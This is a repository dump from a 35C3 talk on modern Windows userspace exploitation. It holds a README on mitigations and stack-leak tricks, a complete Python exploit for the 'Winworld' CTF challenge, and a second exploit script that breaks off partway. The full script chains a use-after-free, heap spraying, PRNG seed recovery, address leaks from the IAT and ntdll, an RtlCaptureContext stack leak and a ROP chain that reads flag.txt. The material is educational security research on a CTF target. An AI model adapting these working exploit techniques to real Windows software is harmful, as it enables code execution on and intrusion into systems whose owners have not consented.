├── README.md
├── images
    ├── RtlCaptureContext.PNG
    └── final.PNG
├── rs5_exploit.py
└── th1_exploit.py


/README.md:
--------------------------------------------------------------------------------
 1 | # 35C3 Modern Windows Userspace Exploitation
 2 | 
 3 | At 35C3 I gave a talk named [“Modern Windows Userspace Exploitation”](https://www.youtube.com/watch?v=kg0J8nRIAhk), that covered the main exploit mitigations in Windows. The point of the talk was to introduce and evaluate the different mitigations that impact memory safety issues, and examine what kind of primitives an exploit developer would need in order to bypass them (since it’s quite a non-trivial process). Since I feel that the best way in order to do this is by example, I used a CTF challenge as a target, and exploited it on Windows 7, Windows 10 TH1 and Windows 10 RS5. The exploits target the great “Winworld” CTF challenge, from Insomnihack CTF Teaser 2017, written by [@awe](https://twitter.com/__awe/) (thanks for writing this!). For a full explanation of what’s going on in this repo, I recommend watching the talk. The exploits in this repo are based on awe's [repo](https://github.com/Insomnihack/Teaser-2017/tree/master/winworld), that had a full exploit for this challenge. There are a couple of key differences between them, though: first, I tried to aim for the simplest exploit for every one of the versions and mitigations I covered in the presentation. The original challenge ran on Windows 10 _pre_ build 16179, compiled with CFG and without ACG, CIG and Child Process Restriction. Second, I used a completely different technique to leak the stack address. While I explained how I gained arbitrary RW and jump primitives in the talk, I didn’t explain this trick, so I will explain it below.
 4 | 
 5 | In his exploit, @awe chose to scan the heap memory, hoping to find random stack pointers there. It is a well known technique (for example, see [@j00ru](https://twitter.com/j00ru)’s [post](https://j00ru.vexillium.org/2016/07/disclosing-stack-data-from-the-default-heap-on-windows/)). It works great for CTFs but it does reduce the reliably of the exploit: in my experiments it worked once every ~X times . To improve reliability, I used a more deterministic technique, by calling _ntdll!RtlCaptureContext_. The function looks like this:
 6 | ![](https://github.com/saaramar/35C3_Modern_Windows_Userspace_Exploitation/blob/master/images/RtlCaptureContext.PNG "")
 7 | 
 8 | I’m not the first one to use this function to leak the stack ([here](https://github.com/niklasb/35c3ctf-challs/blob/master/pwndb/exploit/stage2.py), for instance). It gets as its first argument a pointer to a ContextRecord structure and writes there the current value of all registers. One of them is _rsp_, so by calling this function and reading the value it wrote, the exploit can retrieve the stack address.
 9 | 
10 | For a full explanation of the arbitrary RW and jump primitives, see talk [video](https://www.youtube.com/watch?v=kg0J8nRIAhk), [slides](https://github.com/saaramar/Publications/blob/master/35C3_Windows_Mitigations/Modern%20Windows%20Userspace%20Exploitation.pdf), and @awe mentioned them in his writeup as well.
11 | 
12 | One problem that causes instability of the exploits is that calling _ntdll!RtlCaptureContext_ on a Person object actually corrupts the heap metadata, because sizeof(Person) < sizeof(ContextRecord). When the exploit changes the _onEncounter_ function pointer, it simply sprays more std::strings of commandlines. This “spraying” is dangerous, since commandline is freed immediately after. Put simply, the exploit allocates and frees many chunks, and due to the randomization in the LFH, it writes data on many different chunks in the userblocks. That’s great for setting the uninitialized values in the freed Person instance, but with some low probability, it might hit a corrupted chunk and crash on free().
13 | The solution for that is to leak the address of some *other* person instance in memory, and use my arbitrary write to corrupt his _onEncounter_ function pointer to points to _ucrtbase!gets_, and use it as generic reader/writer. And then we can read the stack pointer relatively to our corrupted person (which we have), with our arbitrary read, without spraying any other std::string.
14 | Note that the offsets in the exploits depend on the specific builds I used. Other builds may require different offsets relative to ntdll.dll and ucrtbase.dll base.
15 | 
16 | ![](https://github.com/saaramar/35C3_Modern_Windows_Userspace_Exploitation/blob/master/images/final.PNG "")


--------------------------------------------------------------------------------
/images/RtlCaptureContext.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/saaramar/35C3_Modern_Windows_Userspace_Exploitation/5253493f6422ca216667669ec104496c2961480d/images/RtlCaptureContext.PNG


--------------------------------------------------------------------------------
/images/final.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/saaramar/35C3_Modern_Windows_Userspace_Exploitation/5253493f6422ca216667669ec104496c2961480d/images/final.PNG


--------------------------------------------------------------------------------
/rs5_exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python2
  2 | # encoding: utf-8
  3 | 
  4 | import sys
  5 | import time
  6 | import ctypes
  7 | import socket
  8 | import struct
  9 | import hexdump
 10 | import telnetlib
 11 | from ctypes.util import find_library
 12 | from time import sleep
 13 | 
 14 | # for pathfinding
 15 | import numpy
 16 | from heapq import *
 17 | 
 18 | PORT                                    = 1337
 19 | LFH_spray_count                         = 0x400
 20 | MAX_ROWS                                = 60
 21 | MAX_COLS                                = 150
 22 | 
 23 | # leak constants
 24 | vtable_vector_offset                    = 0x17158
 25 | iat_strtol_offset                       = 0x162e8
 26 | iat_LdrpValidateUserCallTarget_offset   = 0x164c8
 27 | strtol_offset                           = 0x13860
 28 | LdrpValidateUserCallTargetOffset        = 0x93040
 29 | stack_main_offset                       = -0x290
 30 | 
 31 | # functions offsets
 32 | GETS_OFFSET                             = 0x72ce0
 33 | OPEN_OFFSET                             = 0xa3030
 34 | READ_OFFSET                             = 0x16a70
 35 | PUTS_OFFSET                             = 0x80e10
 36 | 
 37 | def get_s(host):
 38 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 39 |     s.connect((host, PORT))
 40 |     return s
 41 | 
 42 | def rop(gadgets):
 43 |     return ''.join(struct.pack("<Q", gadget) if type(gadget) != str else gadget for gadget in gadgets)
 44 | 
 45 | def heuristic(a, b):
 46 |     return (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2
 47 | 
 48 | def astar(array, start, goal):
 49 |     neighbors = [(0,1),(0,-1),(1,0),(-1,0)]
 50 | 
 51 |     close_set = set()
 52 |     came_from = {}
 53 |     gscore = {start:0}
 54 |     fscore = {start:heuristic(start, goal)}
 55 |     oheap = []
 56 | 
 57 |     heappush(oheap, (fscore[start], start))
 58 | 
 59 |     while oheap:
 60 | 
 61 |         current = heappop(oheap)[1]
 62 | 
 63 |         if current == goal:
 64 |             data = []
 65 |             while current in came_from:
 66 |                 data.append(current)
 67 |                 current = came_from[current]
 68 |             return data
 69 | 
 70 |         close_set.add(current)
 71 |         for i, j in neighbors:
 72 |             neighbor = current[0] + i, current[1] + j
 73 |             tentative_g_score = gscore[current] + heuristic(current, neighbor)
 74 |             if 0 <= neighbor[0] < array.shape[0]:
 75 |                 if 0 <= neighbor[1] < array.shape[1]:
 76 |                     if array[neighbor[0]][neighbor[1]] == 1:
 77 |                         continue
 78 |                 else:
 79 |                     # array bound y walls
 80 |                     continue
 81 |             else:
 82 |                 # array bound x walls
 83 |                 continue
 84 | 
 85 |             if neighbor in close_set and tentative_g_score >= gscore.get(neighbor, 0):
 86 |                 continue
 87 | 
 88 |             if  tentative_g_score < gscore.get(neighbor, 0) or neighbor not in [i[1]for i in oheap]:
 89 |                 came_from[neighbor] = current
 90 |                 gscore[neighbor] = tentative_g_score
 91 |                 fscore[neighbor] = tentative_g_score + heuristic(neighbor, goal)
 92 |                 heappush(oheap, (fscore[neighbor], neighbor))
 93 | 
 94 |     return False
 95 | 
 96 | def get_directions(array, start, end):
 97 |     directions = astar(array, start, end)[::-1]
 98 |     res = ""
 99 |     cur_x, cur_y = start
100 |     for (x, y) in directions:
101 |         if x > cur_x:
102 |             res += "d"
103 |         elif x < cur_x:
104 |             res += "u"
105 |         elif y > cur_y:
106 |             res += "r"
107 |         else:
108 |             res += "l"
109 |         cur_x, cur_y = x, y
110 | 
111 |     return res, directions
112 | 
113 | def send(s, text):
114 |     s.sendall(text)
115 | 
116 | def read(s, length):
117 |     return s.recv(length)
118 | 
119 | def readlen(s, length):
120 |     return ''.join(read(s, 1) for _ in range(length))
121 | 
122 | def sendline(s, text):
123 |     send(s, text + "\n")
124 | 
125 | def readuntil(s, stop):
126 |     res = ''
127 | 
128 |     while not res.endswith(stop):
129 |         c = read(s, 1)
130 | 
131 |         if c == '':
132 |             break
133 |         res += c
134 |     return res
135 | 
136 | def interact(s):
137 |     tn = telnetlib.Telnet()
138 |     tn.sock = s
139 |     tn.interact()
140 |     s.close()
141 |     sys.exit(0)
142 | 
143 | def readall(s):
144 |     out = ''
145 |     while True:
146 |         c = read(s, 1)
147 | 
148 |         if c == '':
149 |             break
150 |         out += c
151 |         sys.stdout.write(c)
152 |         sys.stdout.flush()
153 |     return out
154 | 
155 | def enable_LFH(s, obj_size=0x90):
156 |     print('[+] Make sure that LFH is enabled for bucket of sizeof(Person)')
157 |     for i in range(6):
158 |         sendline(s, "new guest male plz_enable_lfh_" + str(i))
159 | 
160 | def spray_data(s, obj_size=0x90):
161 |     print('[+] Spray 0x%x std::string, forcing initialization of pwnrobot->is_conscious' % LFH_spray_count)
162 |     for i in range(LFH_spray_count):
163 |         print "\r0x%x / 0x%x ..." % (i + 1, LFH_spray_count),
164 |         sendline(s, "C" * obj_size)
165 |     print
166 | 
167 | class ExploitWinworld(object):
168 |     def __init__(self):
169 |         self.binary_base    = 0x0
170 |         self.ucrtbase_base  = 0x0
171 |         self.ntdll_base     = 0x0
172 | 
173 |         self.gets_addr      = 0x0
174 |         self.libc           = None
175 |         self.array          = []
176 |         self.park_map       = []
177 |         self.nmap           = None
178 |         self.maze_x         = 0
179 |         self.maze_y         = 0
180 |         self.day            = 1
181 |         
182 |     def initialize(self):
183 |         self.park_map       = []
184 |         self.nmap           = None
185 |         self.maze_x         = 0
186 |         self.maze_y         = 0
187 |         self.day            = 1
188 | 
189 |     def find_maze_center(self):
190 |         for row in range(MAX_ROWS):
191 |             self.park_map.append([0] * MAX_COLS)
192 | 
193 |         obstacles = ((MAX_ROWS * MAX_COLS) / 5) + (self.rand() % MAX_COLS)
194 | 
195 |         while obstacles:
196 |             pos_x = self.rand() % MAX_ROWS
197 |             pos_y = self.rand() % MAX_COLS
198 | 
199 |             if self.park_map[pos_x][pos_y]:
200 |                 continue
201 | 
202 |             self.park_map[pos_x][pos_y] = 1
203 |             obstacles -= 1
204 | 
205 |             if obstacles == 0:
206 |                 break
207 | 
208 |             nearby_obstacles = (self.rand() % 30) % obstacles
209 | 
210 |             while (nearby_obstacles):
211 |                 direction = self.rand() % 4
212 |                 pos_a = pos_x
213 |                 pos_b = pos_y
214 | 
215 |                 if direction == 0:
216 |                     pos_a -= 1
217 |                 elif direction == 1:
218 |                     pos_a += 1
219 |                 elif direction == 2:
220 |                     pos_b -= 1
221 |                 else:
222 |                     pos_b += 1
223 | 
224 |                 if pos_a < 0 or pos_a >= MAX_ROWS or pos_b < 0 or pos_b >= MAX_COLS:
225 |                     continue
226 | 
227 |                 pos_x = pos_a
228 |                 pos_y = pos_b
229 | 
230 |                 if self.park_map[pos_x][pos_y]:
231 |                     continue
232 | 
233 |                 self.park_map[pos_x][pos_y] = 1
234 |                 nearby_obstacles -= 1
235 |                 obstacles -= 1
236 | 
237 |         while True:
238 |             self.maze_x = self.rand() % MAX_ROWS
239 |             self.maze_y = self.rand() % MAX_COLS
240 | 
241 |             if self.park_map[self.maze_x][self.maze_y] == 0:
242 |                 break
243 | 
244 |     def rand(self):
245 |         return self.libc.rand()
246 | 
247 |     def craft_person(self, func_ptr, leak_addr, size):
248 |         payload  = struct.pack("<Q", func_ptr)        # func pointer
249 |         payload += "\x00" * 24                        # friends std::vector
250 |         payload += "\x00" * 24                        # sentences std::vector
251 | 
252 |         # std::string name
253 |         payload += struct.pack("<Q", leak_addr)
254 |         payload += "C" * 8
255 |         payload += struct.pack("<Q", size)            # size
256 |         payload += struct.pack("<Q", size)            # max_size
257 | 
258 |         payload += struct.pack("<I", 1)               # type = GUEST
259 |         payload += struct.pack("<I", 1)               # sex
260 |         payload += "\x01"                             # is_alive
261 |         payload += "\x01"                             # is_conscious
262 |         payload += "\x01"                             # is_enabled
263 |         payload += "\x01"                             # padding
264 |         payload += struct.pack("<I", 1337)            # days
265 |         payload += struct.pack("<I", 1337)            # moves
266 |         payload += struct.pack("<I", 1337)            # deaths
267 |         payload += struct.pack("<I", self.maze_x)     # pos_x
268 |         payload += struct.pack("<I", self.maze_y)     # pos_y
269 |         payload += struct.pack("<I", 1337)            # attack
270 |         payload += struct.pack("<I", 1337)            # health
271 |         payload += struct.pack("<I", 1337)            # max_health
272 |         payload += struct.pack("<I", 1337)            # luck
273 |         payload += struct.pack("<I", 0)               # sex_affinity
274 |         payload += struct.pack("<I", 0)               # padding
275 | 
276 |         return payload
277 | 
278 |     def leak_data(self, s):
279 |         sendline(s, "info h7")
280 |         readuntil(s, "Name: ")
281 |         leak = readuntil(s, "Type: male guest")
282 |         readuntil(s, "narrator [day 2]$")
283 |         return leak
284 | 
285 |     def spray_person(self, s, payload):
286 |         for i in range(LFH_spray_count):
287 |             print "\r0x%x / 0x%x ..." % (i + 1, LFH_spray_count),
288 |             sendline(s, payload)
289 |         print
290 | 
291 |         return self.leak_data(s)
292 | 
293 | 
294 |     def build_map(self, s):
295 |         print('[+] Discovering the PRNG seed...')
296 | 
297 |         readuntil(s, "--[ Welcome to Winworld, park no ")
298 |         prng_leak = int(readuntil(s, " ").split(" ")[0])
299 | 
300 |         seed = int(time.time())
301 |         self.libc = ctypes.CDLL(find_library('c'))
302 |         self.libc.srand(seed)
303 | 
304 |         if self.rand() % 1337 != prng_leak:
305 |             print '  Clock not synced with server...'
306 |             for i in range(-3000, 3000):
307 |                 bf_seed = seed + i
308 |                 self.libc.srand(bf_seed)
309 |                 if self.rand() % 1337 == prng_leak:
310 |                     print('[+] Resynced clock, delay of %d seconds' % i)
311 |                     break
312 |             else:
313 |                 print('[-] Synchronisation fail...')
314 |                 sys.exit(0)
315 | 
316 |         self.find_maze_center()
317 |         print('[+] Found the maze center: (%d, %d)' % (self.maze_x, self.maze_y))
318 | 
319 |         sendline(s, "map")
320 | 
321 |         readuntil(s, "----+\r\n")
322 |         data = readuntil(s, "+-----").split("+----")[0]
323 |         data = data.replace("|", "")
324 |         data = data.replace("\r", "")
325 |         data = data.split("\n")
326 |         self.array = []
327 | 
328 |         for line in data:
329 |             if len(line) < MAX_COLS:
330 |                 continue
331 |             row = []
332 |             for c in line:
333 |                 if c == ' ':
334 |                     row.append(0)
335 |                 else:
336 |                     row.append(1)
337 |             self.array.append(row)
338 | 
339 |         self.nmap = numpy.array(self.array)
340 |         self.end = (self.maze_x, self.maze_y)
341 | 
342 |     def create_dangling_person_ptr(self, s, add_guest):
343 |         enable_LFH(s)
344 |         spray_data(s)
345 | 
346 |         print('[+] Cloning host, with uninitialized memory this one should have is_conscious...')
347 |         sendline(s, "clone h0 pwnrobot")
348 | 
349 |         guest_cnt = 0x10 - 6 + add_guest
350 |         pwnrobot_gid = 0x10 + 3 + add_guest
351 |         print('[+] Create some guests for later use...')
352 |         for i in range(guest_cnt):
353 |             sendline(s, "new guest male flood%d" % i)
354 | 
355 |         # put "the man in black" on the maze center
356 |         sendline(s, "info g0")
357 | 
358 |         readuntil(s, "Position: (")
359 |         data = readuntil(s, ")").split(")")[0].split(", ")
360 |         start = (int(data[0]), int(data[1]))
361 | 
362 |         print('[+] Moving a guest to the maze center {} -> {}...'.format(start, self.end))
363 | 
364 |         self.array[start[0]][start[1]] = 0
365 |         moves, directions_guest = get_directions(self.nmap, start, self.end)
366 | 
367 |         sendline(s, "move g0 " + moves)
368 | 
369 |         # put the pwn host on the maze center
370 | 
371 |         sendline(s, "info h7")
372 | 
373 |         readuntil(s, "Position: (")
374 |         data = readuntil(s, ")").split(")")[0].split(", ")
375 |         start = (int(data[0]), int(data[1]))
376 | 
377 |         print('[+] Moving our host to the maze center {} -> {}...'.format(start, self.end))
378 | 
379 |         self.array[start[0]][start[1]] = 0
380 |         moves, directions_host = get_directions(self.nmap, start, self.end)
381 | 
382 |         sendline(s, "move h7 " + moves)
383 | 
384 |         print('[+] pwnrobot should now be a human... kill him!')
385 | 
386 |         for i in range(10):
387 |             sendline(s, "move g0 lr")
388 | 
389 |         readuntil(s, "pwnrobot met a tragic death")
390 | 
391 |         sendline(s, 'fail')
392 |         readuntil(s, "fail")
393 | 
394 |         print('[+] Removing all pwnrobot\'s friends --> decrement its refcount to 0 --> free()')
395 | 
396 |         for i in range(7):
397 |             sendline(s, "friend remove g%d h%d" % (pwnrobot_gid, i))
398 | 
399 |         sendline(s, "info g3")
400 | 
401 |         sendline(s, "next_day")
402 |         self.day += 1
403 |         readuntil(s, "narrator [day 2]$")
404 | 
405 |     def get_empty_point(self):
406 |         for i in xrange(1, MAX_ROWS):
407 |             for j in xrange(1, MAX_COLS):
408 |                 if self.array[i][j] == 0:
409 |                     return(i,j)
410 |         assert False
411 | 
412 |     def prepare_uaf(self, s, add_guest=0x0):
413 |         self.initialize()
414 |         self.build_map(s)
415 |         self.create_dangling_person_ptr(s, add_guest)
416 | 
417 |     def leak_base_addr(self, s, obj_size=0x90):
418 |         '''for i in range(0xf0):
419 |             print "\r0x%x / 0x%x ..." % (i + 1, 0xf0),
420 |             sendline(s, "D" * obj_size)
421 |         print'''
422 | 
423 |         print("[+] spray std::vectors to catch freed person, read pointer to main binary .rdata")
424 |         #for i in range(8 * 2):
425 |         for i in range(LFH_spray_count):
426 |             print "\r0x%x / 0x%x ..." % (i + 1, LFH_spray_count),
427 |             for j in range(7):
428 |                 sendline(s, "friend add g%d g%d" % (3 + i, 8 + 3 + j))
429 |         print
430 | 
431 |         print("[+] sync...")
432 |         sleep(8)
433 | 
434 |         print('[+] Trigger leak')
435 |         sendline(s, "info h7")
436 |         readuntil(s, "Name: ")
437 | 
438 |         leak = readlen(s, 8)
439 |         binleak = struct.unpack("<Q", leak[:8])[0]
440 |         print('[+] Binary leak: %#x' % binleak)
441 |         binary_base = binleak - vtable_vector_offset
442 |         print('[+] Binary base: %#x' % binary_base)
443 |         assert(binary_base & 0xfff == 0)
444 |         self.binary_base = binary_base
445 | 
446 |     def trigger_arbitrary_read(self, s, addr_to_read):
447 |         payload = self.craft_person(func_ptr=self.gets_addr,
448 |                                         leak_addr=addr_to_read,
449 |                                         size=0x100)
450 |         sendline(s, "move h7 rl") # trigger gets
451 |         sendline(s, payload)
452 | 
453 |         return self.leak_data(s)
454 | 
455 |     def leak_ucrtbase(self, s):
456 |         print('[+] Leaking ucrtbase!strtol from IAT...')
457 |         iat_strtol = self.binary_base + iat_strtol_offset
458 | 
459 |         payload = self.craft_person(func_ptr=0x4242424242424242, leak_addr=iat_strtol, size=0x100)
460 |         leak = self.spray_person(s, payload)
461 |         
462 |         strtol = struct.unpack("<Q", leak[:8])[0]
463 |         
464 |         ucrtbase_base = strtol - strtol_offset
465 |         print('[+] ucrtbase!strtol: 0x%x' % strtol)
466 |         print('[+] ucrtbase base: %#x' % ucrtbase_base)
467 |         assert(ucrtbase_base & 0xfff == 0)
468 |         self.ucrtbase_base = ucrtbase_base
469 | 
470 |     def leak_ntdll(self, s):
471 |         iat_LdrpValidateUserCallTarget = self.binary_base + iat_LdrpValidateUserCallTarget_offset
472 |         payload = self.craft_person(func_ptr=self.gets_addr, leak_addr=iat_LdrpValidateUserCallTarget, size=0x100)
473 |         for i in xrange(0x400):
474 |             sendline(s, payload)
475 | 
476 |         leak = self.trigger_arbitrary_read(s, addr_to_read=iat_LdrpValidateUserCallTarget)
477 |         LdrpValidateUserCallTarget = struct.unpack("<Q", leak[:8])[0]
478 |         ntdll_base = LdrpValidateUserCallTarget - LdrpValidateUserCallTargetOffset
479 |         print('[+] ntdll!LdrpValidateUserCallTarget: 0x%x' % LdrpValidateUserCallTarget)
480 |         print('[+] ntdll base: 0x%x' % ntdll_base)
481 |         assert(ntdll_base & 0xfff == 0)
482 |         self.ntdll_base = ntdll_base
483 | 
484 |     def leak_stack(self, s):
485 |         leak = self.trigger_arbitrary_read(s, addr_to_read=self.binary_base + 0x1fbd0)
486 |         heap_ptr = struct.unpack("<Q", leak[:8])[0]
487 |         print("[+] heap_ptr == 0x%x" % heap_ptr)
488 | 
489 |         RtlCaptureContext = self.ntdll_base + 0xa65a0
490 |         payload = self.craft_person(func_ptr=RtlCaptureContext, leak_addr=RtlCaptureContext, size=0x0)
491 |         for i in xrange(0x400):
492 |             sendline(s, payload)
493 | 
494 |         sendline(s, "move h7 lr")
495 |         sendline(s, "info h7")
496 | 
497 |         leak = readuntil(s, ", luck")        
498 |         leak = leak[leak.rfind("/"):]
499 |         leak = leak[1:leak.index(",")]
500 |         leak = int(leak, 10)
501 |         pwnrobot = (heap_ptr & 0xffffffff00000000) | (leak & 0xffffffff)
502 |         print("[+] pwnrobot == 0x%x" % pwnrobot)
503 | 
504 |         payload = self.craft_person(func_ptr=self.gets_addr,
505 |                                         leak_addr=pwnrobot + 0xb0,
506 |                                         size=0x100)
507 |         for i in xrange(0x400):
508 |             sendline(s, payload)
509 | 
510 |         leak = self.trigger_arbitrary_read(s, addr_to_read=pwnrobot + 0xb0)
511 |         self.stack_ptr = struct.unpack("<Q", leak[:8])[0]
512 | 
513 |         print("[+] stack_ptr == 0x%x" % self.stack_ptr)
514 | 
515 |         payload = self.craft_person(func_ptr=self.gets_addr,
516 |                                         leak_addr=self.stack_ptr - stack_main_offset,
517 |                                         size=0x1000)
518 |         for i in xrange(0x400):
519 |             sendline(s, payload)
520 | 
521 | 
522 |     def do_rop(self, s):
523 |         pop_all     = self.ntdll_base + 0x92f6f     # pop rdx ; pop rcx ; pop r8 ; pop r9 ; pop r10; pop r11; ret
524 |         pop_rcx     = self.ntdll_base + 0x968e1     # pop rcx ; ret
525 |         pop_rbx_ret = self.ntdll_base + 0x2074      # pop rbx ; ret
526 |         add_rsp_38h = self.ntdll_base + 0x4a83      # add rsp, 0x38 ; ret
527 | 
528 |         raw_input("start rop?")
529 | 
530 |         # ROP to: open("flag.txt", O_RDONLY);
531 |         payload = rop([
532 |             pop_rbx_ret, 
533 |             self.stack_ptr - 0x2000,
534 | 
535 |             # ucrtbase!_open("flag.txt", O_RDONLY)
536 |             pop_all,
537 |             0x0,                 # flags
538 |             "ABCDEFGH",          # buf
539 |             0x0,                 # mode
540 |             0,
541 |             0,
542 |             0,
543 |             self.ucrtbase_base + OPEN_OFFSET,
544 | 
545 |             # cleanup junk from open()
546 |             add_rsp_38h,
547 |             self.stack_ptr - 0x1000,
548 |             self.stack_ptr - 0x1000,
549 |             self.stack_ptr - 0x1000,
550 |             self.stack_ptr - 0x1000,
551 |             self.stack_ptr - 0x1000,
552 |             self.stack_ptr - 0x1000,
553 |             self.stack_ptr - 0x1000,
554 | 
555 |             # read(fd, buf, 0x100)
556 |             pop_all,
557 |             "ABCDEFGH",           # buf
558 |             0x3,                  # fd
559 |             0x100,                # count
560 |             0,
561 |             0,
562 |             0,
563 |             self.ucrtbase_base + READ_OFFSET,
564 | 
565 |             # cleanup junk from read()
566 |             add_rsp_38h,
567 |             self.stack_ptr - 0x1000,
568 |             self.stack_ptr - 0x1000,
569 |             self.stack_ptr - 0x1000,
570 |             self.stack_ptr - 0x1000,
571 |             self.stack_ptr - 0x1000,
572 |             self.stack_ptr - 0x1000,
573 |             self.stack_ptr - 0x1000,
574 | 
575 |             # puts(buf)
576 |             pop_rcx,
577 |             "ABCDEFGH",                             # buf
578 |             self.ucrtbase_base + PUTS_OFFSET,
579 |         ])
580 | 
581 |         payload += "C" * 60
582 |         payload = payload.replace("ABCDEFGH", struct.pack("<Q", self.stack_ptr - stack_main_offset + len(payload)))
583 |         payload += "flag.txt\x00"
584 | 
585 |         sendline(s, "update h7 name " + payload)
586 | 
587 |         print('[+] Trigger ROP chain...')
588 | 
589 |         sendline(s, "quit")
590 | 
591 |         print "flag: ",
592 |         try:
593 |             readuntil(s, "flag: ")
594 |             print(readuntil(s, "\n"))
595 |         except:
596 |             pass
597 | 
598 | if __name__ == "__main__":
599 |     host = "127.0.0.1"
600 |     if len(sys.argv) > 1:
601 |         host = sys.argv[1]
602 | 
603 |     exploiter = ExploitWinworld()
604 |     print("-------------------- Phase0 - leak the main binary base addr --------------------")
605 |     s = get_s(host)
606 |     exploiter.prepare_uaf(s, add_guest=LFH_spray_count)
607 |     exploiter.leak_base_addr(s)
608 |     s.close()
609 | 
610 |     sleep(1)
611 |     s = get_s(host)
612 | 
613 |     print("-------------------- Phase1 - leak ucrtbase.dll base addr --------------------")    
614 |     exploiter.prepare_uaf(s)
615 |     exploiter.leak_ucrtbase(s)
616 |     exploiter.gets_addr = exploiter.ucrtbase_base + GETS_OFFSET
617 |     
618 |     print("-------------------- Phase2 - leak ntdll.dll base addr --------------------")
619 |     exploiter.leak_ntdll(s)
620 | 
621 |     print("-------------------- Phase3 - Execute code --------------------")
622 |     exploiter.leak_stack(s)
623 |     exploiter.do_rop(s)
624 | 
625 |     print("")
626 |     print('[+] Done')
627 |     s.close()


--------------------------------------------------------------------------------
/th1_exploit.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python2
  2 | # encoding: utf-8
  3 | 
  4 | import sys
  5 | import time
  6 | import ctypes
  7 | import socket
  8 | import struct
  9 | import hexdump
 10 | import telnetlib
 11 | from ctypes.util import find_library
 12 | from time import sleep
 13 | 
 14 | # for pathfinding
 15 | import numpy
 16 | from heapq import *
 17 | 
 18 | PORT                                    = 1337
 19 | LFH_spray_count                         = 0x100
 20 | MAX_ROWS                                = 60
 21 | MAX_COLS                                = 150
 22 | 
 23 | # leak constants
 24 | vtable_vector_offset                    = 0x17158
 25 | iat_strtol_offset                       = 0x162e8
 26 | iat_LdrpValidateUserCallTarget_offset   = 0x164c8
 27 | strtol_offset                           = 0x54900
 28 | LdrpValidateUserCallTargetOffset        = 0x83700
 29 | stack_main_offset                       = -0x290
 30 | 
 31 | # functions offsets
 32 | GETS_OFFSET                             = 0x6bbd0
 33 | SYSTEM_OFFSET                           = 0xa2f4c
 34 | 
 35 | def get_s(host):
 36 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 37 |     s.connect((host, PORT))
 38 |     return s
 39 | 
 40 | def rop(gadgets):
 41 |     return ''.join(struct.pack("<Q", gadget) if type(gadget) != str else gadget for gadget in gadgets)
 42 | 
 43 | def heuristic(a, b):
 44 |     return (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2
 45 | 
 46 | def astar(array, start, goal):
 47 |     neighbors = [(0,1),(0,-1),(1,0),(-1,0)]
 48 | 
 49 |     close_set = set()
 50 |     came_from = {}
 51 |     gscore = {start:0}
 52 |     fscore = {start:heuristic(start, goal)}
 53 |     oheap = []
 54 | 
 55 |     heappush(oheap, (fscore[start], start))
 56 | 
 57 |     while oheap:
 58 | 
 59 |         current = heappop(oheap)[1]
 60 | 
 61 |         if current == goal:
 62 |             data = []
 63 |             while current in came_from:
 64 |                 data.append(current)
 65 |                 current = came_from[current]
 66 |             return data
 67 | 
 68 |         close_set.add(current)
 69 |         for i, j in neighbors:
 70 |             neighbor = current[0] + i, current[1] + j
 71 |             tentative_g_score = gscore[current] + heuristic(current, neighbor)
 72 |             if 0 <= neighbor[0] < array.shape[0]:
 73 |                 if 0 <= neighbor[1] < array.shape[1]:
 74 |                     if array[neighbor[0]][neighbor[1]] == 1:
 75 |                         continue
 76 |                 else:
 77 |                     # array bound y walls
 78 |                     continue
 79 |             else:
 80 |                 # array bound x walls
 81 |                 continue
 82 | 
 83 |             if neighbor in close_set and tentative_g_score >= gscore.get(neighbor, 0):
 84 |                 continue
 85 | 
 86 |             if  tentative_g_score < gscore.get(neighbor, 0) or neighbor not in [i[1]for i in oheap]:
 87 |                 came_from[neighbor] = current
 88 |                 gscore[neighbor] = tentative_g_score
 89 |                 fscore[neighbor] = tentative_g_score + heuristic(neighbor, goal)
 90 |                 heappush(oheap, (fscore[neighbor], neighbor))
 91 | 
 92 |     return False
 93 | 
 94 | def get_directions(array, start, end):
 95 |     directions = astar(array, start, end)[::-1]
 96 |     res = ""
 97 |     cur_x, cur_y = start
 98 |     for (x, y) in directions:
 99 |         if x > cur_x:
100 |             res += "d"
101 |         elif x < cur_x:
102 |             res += "u"
103 |         elif y > cur_y:
104 |             res += "r"
105 |         else:
106 |             res += "l"
107 |         cur_x, cur_y = x, y
108 | 
109 |     return res, directions
110 | 
111 | def send(s, text):
112 |     s.sendall(text)
113 | 
114 | def read(s, length):
115 |     return s.recv(length)
116 | 
117 | def readlen(s, length):
118 |     return ''.join(read(s, 1) for _ in range(length))
119 | 
120 | def sendline(s, text):
121 |     send(s, text + "\n")
122 | 
123 | def readuntil(s, stop):
124 |     res = ''
125 | 
126 |     while not res.endswith(stop):
127 |         c = read(s, 1)
128 | 
129 |         if c == '':
130 |             break
131 |         res += c
132 |     return res
133 | 
134 | def interact(s):
135 |     tn = telnetlib.Telnet()
136 |     tn.sock = s
137 |     tn.interact()
138 |     s.close()
139 |     sys.exit(0)
140 | 
141 | def readall(s):
142 |     out = ''
143 |     while True:
144 |         c = read(s, 1)
145 | 
146 |         if c == '':
147 |             break
148 |         out += c
149 |         sys.stdout.write(c)
150 |         sys.stdout.flush()
151 |     return out
152 | 
153 | def enable_LFH(s, obj_size=0x90):
154 |     print('[+] Make sure that LFH is enabled for bucket of sizeof(Person)')
155 |     for i in range(6):
156 |         sendline(s, "new guest male plz_enable_lfh_" + str(i))
157 | 
158 | def spray_data(s, obj_size=0x90):
159 |     print('[+] Spray 0x%x std::string, forcing initialization of pwnrobot->is_conscious' % LFH_spray_count)
160 |     for i in range(LFH_spray_count):
161 |         print "\r0x%x / 0x%x ..." % (i + 1, LFH_spray_count),
162 |         sendline(s, "C" * obj_size)
163 |     print
164 | 
165 | class ExploitWinworld(object):
166 |     def __init__(self):
167 |         self.binary_base    = 0x0
168 |         self.ucrtbase_base  = 0x0
169 |         self.ntdll_base     = 0x0
170 | 
171 |         self.gets_addr      = 0x0
172 |         self.libc           = None
173 |         self.array          = []
174 |         self.park_map       = []
175 |         self.nmap           = None
176 |         self.maze_x         = 0
177 |         self.maze_y         = 0
178 |         self.day            = 1
179 |         
180 |     def initialize(self):
181 |         self.park_map       = []
182 |         self.nmap           = None
